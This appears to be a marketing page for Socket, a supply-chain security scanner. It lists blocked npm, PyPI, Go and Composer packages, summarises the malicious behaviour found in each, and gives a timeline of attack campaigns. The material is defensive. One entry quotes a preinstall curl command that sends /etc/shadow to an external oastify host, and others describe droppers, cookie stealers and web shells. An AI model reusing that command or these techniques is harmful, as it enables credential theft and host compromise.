Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
timmywil published 4.0.0

left-pad
stevemao published 1.3.0

react
react-bot published 19.2.4

We protect you from vulnerable and malicious packages

github.com/weaveworks/weave

v1.1.2-0.20151013080203-54a4add40fdb

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

354766/chirag2653/website-to-skill-folder/website-to-skill-folder/

09ca7f1f4ee9514ea8102e16299b2914449573f4

Live on socket

Blocked by Socket

[Skill Scanner] Natural language instruction to download and install from URL detected. No direct malicious code or explicit backdoor indicators are present in the provided documentation fragment. The dominant security concerns are: (1) credential exposure risk from advising users to inline FIRECRAWL_API_KEY into shell commands, (2) privacy/third-party data exposure because page contents and credentials are sent to the Firecrawl service, and (3) general supply-chain risk of executing a local pipeline.py without verification. Recommended mitigations: avoid inlining secrets, inspect and verify pipeline.py before executing, restrict crawl scope to public pages, and prefer local crawling if privacy is required. For a definitive malware determination, review the actual pipeline.py implementation and any network endpoints it contacts.

LLM verification: No explicit malicious code is present in this documentation fragment, but there are multiple supply-chain and operational security risks: (1) instructing users to place API keys inline on the command line (credential exposure), (2) recommending unpinned pip installs (package supply-chain risk), and (3) requiring execution of an unreviewed local script (scripts/pipeline.py) which could perform arbitrary actions. Recommend: do not run the pipeline.py until you review its source; avoid embedding AP

dana

0.25.7.29

Removed from pypi

Blocked by Socket

This module itself contains no obvious hidden backdoor or obfuscated malicious payload, but it intentionally executes external Python files found under multiple search paths (including user-writable locations like the current working directory and user home). That design introduces a high-risk supply-chain/plugin execution vector: untrusted plugin files named <domain>.py or package directories can run arbitrary code via exec_module and class instantiation. Recommend treating plugins from those paths as untrusted, restricting or validating plugin locations, using cryptographic signing or checksum verification, or executing plugins in an isolated process. Do not place sensitive credentials or run as privileged user when plugin discovery paths include writable directories.

Live on pypi for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

@speedshop/sdk-api

21.5.4

by spongebhavh1

Live on npm

Blocked by Socket

The fragment exfiltrates local system information to an external domain without explicit user consent or clear documentation within the snippet. While it uses HTTPS for transport, the lack of consent, visibility, and controls constitutes a privacy and supply-chain concern. The code could be legitimate telemetry in some deployments, but as-is it presents a potential data leakage risk and warrants further provenance checks and disclosure.

mtmai

0.3.883

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

erc4337

0.0.1

by snap_

Removed from npm

Blocked by Socket

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

@emilgroup/customer-sdk

1.54.5

by cover42devs

Removed from npm

Blocked by Socket

This script is a high-risk supply-chain abuse tool. It programmatically uses npm tokens from environment variables to enumerate package names owned by the token holders, temporarily alters local package metadata and README, and runs npm publish with the token to publish the repository contents as versions of those packages. It is likely intended to be used to mass-publish or backdoor packages when executed in environments with exposed tokens (e.g., CI). Treat presence of this script as malicious or highly dangerous: remove it, rotate any exposed tokens, audit CI environments for inadvertent exposure, and inspect any unexpected package versions published from your accounts.

Live on npm for 4 days, 3 hours and 9 minutes before removal. Socket users were protected even while the package was live.

poliduckie-segmentation

0.0.9

Live on pypi

Blocked by Socket

The model file is a standard UNet-like tf.keras model except it includes a Lambda layer with an embedded serialized Python function (opaque bytes). This pattern allows arbitrary code execution in the host Python process during model load or inference and therefore constitutes a high-risk supply-chain/deserialization threat. Treat the artifact as untrusted until the Lambda's payload is safely decoded and audited or the Lambda is removed/replaced with graph-native preprocessing.

tx-engine

0.6.1

Live on pypi

Blocked by Socket

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

hnypdf

2.1.0

by heningyuan

Live on npm

Blocked by Socket

This module is primarily a client-side PDF annotator/exporter, but it also performs high-risk remote behavior: it embeds object storage credentials directly in the client and uploads user-selected non-PDF content to external infrastructure, then calls a hardcoded external HTTP backend to process and return content. This creates a clear data-exfiltration/remote-processing supply-chain risk. There is no clear evidence of classic execution-based malware in the excerpt, but the credential exposure + fixed egress endpoints make the security posture unacceptable without remediation (remove embedded secrets, move uploads/processing to a trusted backend with proper auth, use HTTPS, and make endpoints configurable/auditable).

sharpgl

1.0.0

by gkoeh963xv

Removed from npm

Blocked by Socket

The code is malicious and poses a serious security risk. It performs unauthorized collection of extensive system and user environment information and stealthily exfiltrates this data to a hardcoded remote server. This is a clear supply chain security incident involving data theft. The obfuscation and silent error handling reinforce the intent to evade detection. Immediate removal and blocking of this package is strongly recommended.

Live on npm for 9 days, 11 hours and 44 minutes before removal. Socket users were protected even while the package was live.

prior-cli

1.3.3

by prior.network

Live on npm

Blocked by Socket

This dependency/module exposes multiple high-impact host-control primitives: arbitrary command execution (unvalidated interpolation), clipboard read/write (including direct clipboard exfiltration to the caller), and writing attacker-influenced base64 content to a filesystem path influenced by remote filename plus cwd. It also forwards bearer tokens to external services. While the code is not visibly obfuscated, the capability set is sufficiently dangerous that the module should be treated as security-critical and requires strict access control, input validation, and path hardening around tool invocation and remote filename handling.

spyware

1.0.2

Live on pypi

Blocked by Socket

This setup script packages and installs a program explicitly designed as 'SpyWare'. It contains multiple high-risk behaviors: running shell commands at install time (including sudo apt-get), invoking pip to install a wheel by constructed filename, registering a console script that will execute spying code, and linking to prebuilt binaries. The file strongly indicates intentional malicious functionality (keylogging, screenshotting, webcam/audio capture, clipboard and file monitoring). Do not install or run this package. Further inspection of the package's runtime modules and any distributed binaries is required to enumerate full capabilities and exfiltration channels.

github.com/sourcegraph/sourcegraph

v0.0.0-20210114141206-73fa30e0f52a

Live on go

Blocked by Socket

This module is a deliberate destructive utility that corrupts all .zip files in a specified directory by truncating each archive to half its size and appending repeated junk data. While it lacks common malware features like networking or data exfiltration, the behavior is strongly indicative of sabotage and would be unacceptable in most software supply-chain contexts due to its potential to break builds, deployments, or artifact integrity.

fca-rqzax

6.1.5

by rqzax2

Removed from npm

Blocked by Socket

This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary to determine its exact behavior.

Live on npm for 42 minutes before removal. Socket users were protected even while the package was live.

com.meta.utilities

99.0.0

by vk258986

Removed from npm

Blocked by Socket

This module collects host- and user-identifying data (including package name/version, hostname, username, home directory, DNS servers and output of 'uname -a') and transmits it to a hardcoded external domain via an HTTPS GET and a DNS lookup. There is no user consent or configuration. This behavior constitutes data exfiltration and is malicious or at least highly suspicious for a production dependency. Recommend removing or isolating the package, blocking network access to the domain, and investigating how this code was introduced.

Live on npm for 19 hours and 33 minutes before removal. Socket users were protected even while the package was live.

cylab-be/webshell-detector

dev-include_wowa_training

Live on composer

Blocked by Socket

This Python 2 script is an interactive controller meant to send arbitrary shell commands to a web-based backdoor endpoint specified by the user. Though it contains coding errors that prevent execution as-is, its intent is clearly malicious (remote command execution/C2 controller). Treat it as malware/abuse tooling: do not run it against systems you do not own or administer. Remove from trusted supply chains and investigate related artifacts if found in a project.

cylab-be/webshell-detector

dev-include_wowa_training

Live on composer

Blocked by Socket

This PHP file is a malicious web shell/backdoor (NetworkFileManagerPHP) designed for unauthorized access and abuse. It enables remote command execution (via system/exec and a command box), arbitrary file read/write/upload, remote binary download and execution (bind shell), credential harvesting, FTP bruteforcing, mass emailing/spamming, and database dumping. It also automatically exfiltrates server/environment information to hardcoded external email addresses. This is active malware/backdoor code and should not be deployed; any server containing it should be considered compromised and undergo incident response.

matialvarezs-time-sleep

0.1.47

Live on pypi

Blocked by Socket

Severe security vulnerability: the module eval()s the 'stop' field of a remote JSON response, enabling arbitrary remote code execution. This constitutes a backdoor/supply-chain risk if the configured URL or response can be controlled. Additional quality issues (undefined return variable, lack of error handling, unused string) exist. Do not use this code as-is — replace eval with safe parsing/validation, secure the remote endpoint (authentication, integrity checks), and fix the bug and error handling.

ailever

1.0.80

Live on pypi

Blocked by Socket

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

github.com/weaveworks/weave

v1.2.1-0.20151103175540-e95e3cc29dc1

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

zohodeskportalsdksampleappsreactnative

3.1.0

by testme000123

Removed from npm

Blocked by Socket

The script attempts to send sensitive system information to an external server, which poses a significant security risk and is indicative of malicious intent.

Live on npm for 4 hours and 39 minutes before removal. Socket users were protected even while the package was live.

@ambuj.bhaskar/react-component-library

0.30.9

by ambuj.bhaskar

Live on npm

Blocked by Socket

This module contains a deliberate malicious/unwanted payload: a locale-and-host targeted routine that disables user interaction and injects/plays an externally hosted audio file (https://flag-gimn.ru/...). This behavior is not legitimate for an annotation/UI library and should be considered malicious backdoor/tampering. Remove that conditional block immediately and audit repository history/maintainers for supply-chain compromise. The remainder of the code appears to implement expected UI/annotation functionality (hotkeys, canvas rendering, network mutate calls) but should be audited in context; network mutations are legitimate sinks for user data and should be validated (endpoints, auth). Treat the package as compromised until provenance is verified.

agent-messenger

2.6.3

by GitHub Actions

Live on npm

Blocked by Socket

This module is an explicit, purpose-built Instagram cookie/session token extractor. It scans multiple browser profile cookie databases, copies them to temporary storage, filters for Instagram authentication cookies, and decrypts protected cookie values using OS credential/crypto mechanisms (Windows DPAPI via PowerShell, macOS keychain via `security` CLI, and Linux with deterministic derived-key decryption). It then returns plaintext session-critical cookies to the caller, which would enable account/session hijacking. No network exfiltration is shown in this code fragment, but the capability to harvest and recover usable authentication material is strongly malicious/high-risk.


Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Unstable ownership

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Skill: Pre-execution shell command

Suspicious Stars on GitHub

55 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

RUST

crates.io

Rust Package Manager

PHP

Packagist

PHP Package Manager

GOLANG

Go Modules

Go Dependency Management

JAVA

Maven Central

JAVASCRIPT

npm

Node Package Manager

.NET

NuGet

.NET Package Manager

PYTHON

PyPI

Python Package Index

RUBY

RubyGems.org

Ruby Package Manager

SWIFT

Swift

AI

Hugging Face Hub

AI Model Hub

CI

GitHub Actions

CI/CD Workflows

EXTENSIONS

Chrome Web Store

Chrome Browser Extensions

EXTENSIONS

Open VSX

VS Code Extensions

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

The latest from the Socket team

Get our latest security research, open source insights, and product updates.
